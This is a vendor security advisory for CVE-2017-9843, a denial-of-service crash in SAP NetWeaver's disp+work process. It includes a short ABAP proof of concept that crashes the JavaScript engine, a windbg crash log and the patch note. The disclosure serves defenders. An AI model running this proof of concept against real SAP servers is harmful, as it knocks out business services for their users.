ERPScanERPSCAN-17-010SAP NetWeaver AS ABAP disp+work crash
0.001 Low
EPSS
Percentile
48.3%
Application: SAP NetWeaver ABAP **Versions Affected:**SAP KERNEL 7.40 64BIT, disp+work.exe (7400.12.21.30308) Vendor URL: SAP **Bugs:**DoS **Reported: **15.12.2016 **Vendor response:**16.12.2016 **Date of Public Advisory:**14.03.2017 **Reference:**SAP Security Note 2406841 Author: Vahagn Vardanyan (ERPScan)
VULNERABILITY INFORMATION
Class: DoS
Impact: Denial of Service
Remotely Exploitable: yes
Locally Exploitable: no
CVE: CVE-2017-9843
CVSS Information
CVSS Base Score v3: 2.7 / 10
CVSS Base Vector:
| AV: Attack Vector (Related exploit range) | Network (N) |
|---|---|
| AC: Attack Complexity (Required attack complexity) | Low (L) |
| PR: Privileges Required (Level of privileges needed to exploit) | High (H) |
| UI: User Interaction (Required user participation) | None (N) |
| S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
| C: Impact to Confidentiality | None (N) |
| I: Impact to Integrity | None (N) |
| A: Impact to Availability | Low (L) |
Description
The vulnerability is presented in disp+work.exe in Javascript executing time.
Business risk
An attacker can use a Denial of Service vulnerability for terminating the process of a vulnerable component. For this time nobody can use this service that negatively influences the business processes, system downtime, and business reputation as a result.
VULNERABLE PACKAGES
SAP KERNEL 7.40 64BIT, disp+work.exe (7400.12.21.30308)
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2406841
TECHNICAL DESCRIPTION
Proof of Concept
data SOURCE type STRING. data JS_PROCESSOR type ref to CL_JAVA_SCRIPT. data RETURN_VALUE type STRING. JS_PROCESSOR = CL_JAVA_SCRIPT=>CREATE( ). SOURCE = ’ this (1,2,3,4)'. "!!! null pointer JS_PROCESSOR->COMPILE( SCRIPT_NAME = ‘tmp.JS’ SCRIPT = SOURCE ). RETURN_VALUE = JS_PROCESSOR->EXECUTE( ‘tmp.JS’ ). This is a windbg log 0:000> r rax=0000000000000000 rbx=000007df8014b6e0 rcx=000007df800cf8e0 rdx=000007df80149100 rsi=000007df800cf8e0 rdi=0000000000000000 rip=00000001415d6759 rsp=0000000002149ec0 rbp=0000000000000000 r8=000007df8014b6e0 r9=0000000000000000 r10=0000000000000000 r11=0000000002149e80 r12=000007df801496e0 r13=00000001415ed7f0 r14=000007df80149710 r15=000007df80149100 iopl=0 nv up ei ng nz na pe cy cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010283 disp_work!ComputeThis+0x29: 00000001415d6759 4c8b4008 mov r8,qword ptr [rax+8] ds:0000000000000008=???
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
data SOURCE type STRING.
data JS_PROCESSOR type ref to CL_JAVA_SCRIPT.
data RETURN_VALUE type STRING.
JS_PROCESSOR = CL_JAVA_SCRIPT=>CREATE( ).
SOURCE = ’ this (1,2,3,4)'. "!!! null pointer
JS_PROCESSOR->COMPILE( SCRIPT_NAME = ‘tmp.JS’
SCRIPT = SOURCE ).
RETURN_VALUE = JS_PROCESSOR->EXECUTE( ‘tmp.JS’ ).
This is a windbg log
0:000> r
rax=0000000000000000 rbx=000007df8014b6e0 rcx=000007df800cf8e0
rdx=000007df80149100 rsi=000007df800cf8e0 rdi=0000000000000000
rip=00000001415d6759 rsp=0000000002149ec0 rbp=0000000000000000
r8=000007df8014b6e0 r9=0000000000000000 r10=0000000000000000
r11=0000000002149e80 r12=000007df801496e0 r13=00000001415ed7f0
r14=000007df80149710 r15=000007df80149100
iopl=0 nv up ei ng nz na pe cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010283
disp_work!ComputeThis+0x29:
00000001415d6759 4c8b4008 mov r8,qword ptr [rax+8] ds:0000000000000008=???
—|—
Call stack
Related
